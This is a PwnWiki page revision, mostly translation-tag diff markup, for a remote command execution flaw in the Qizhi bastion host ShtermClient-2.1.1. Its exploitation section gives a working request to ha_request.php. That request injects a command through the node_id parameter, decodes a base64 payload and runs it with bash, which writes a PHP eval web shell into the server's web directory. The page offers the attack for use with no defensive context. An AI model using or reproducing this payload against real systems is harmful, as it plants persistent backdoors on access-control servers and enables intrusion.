Difference between revisions of "齊治堡壘機前台遠程命令執行漏洞"

From PwnWiki
(Created page with "<languages /> <translate> ==漏洞影響== </translate> <pre> ShtermClient-2.1.1 </pre> <translate> ==漏洞利用== </translate> <translate> ==漏洞利用== </translate...")
 
(Marked this version for translation)
 
Line 2: Line 2:
  
 
<translate>
 
<translate>
==漏洞影響==
+
==漏洞影響== <!--T:1-->
 
</translate>
 
</translate>
 
<pre>
 
<pre>
Line 9: Line 9:
  
 
<translate>
 
<translate>
==漏洞利用==
+
==漏洞利用== <!--T:2-->
 
</translate>
 
</translate>
  
 
<translate>
 
<translate>
==漏洞利用==
+
==漏洞利用== <!--T:3-->
 
</translate>
 
</translate>
 
1.訪問 <code>http://10.20.10.11/listener/cluster\_manage.php</code> 返回OK;
 
1.訪問 <code>http://10.20.10.11/listener/cluster\_manage.php</code> 返回OK;

Latest revision as of 09:31, 10 April 2021

Other languages:

漏洞影響

ShtermClient-2.1.1

漏洞利用

漏洞利用

1.訪問 http://10.20.10.11/listener/cluster\_manage.php 返回OK;

2.訪問如下鏈接生成一句話木馬

https://10.20.10.10/ha_request.php?action=install&ipaddr=10.20.10.11&node_id=1${IFS}|`echo${IFS}"ZWNobyAnPD9waHAgQGV2YWwoJF9SRVFVRVNUW3NoZWxsXSk7Pz4nPj4vdmFyL3d3dy9zaHRlcm0vcmVzb3VyY2VzL3FyY29kZS9zaGVsbC5waHA="|base64${IFS}-d|bash`|${IFS}|echo${IFS}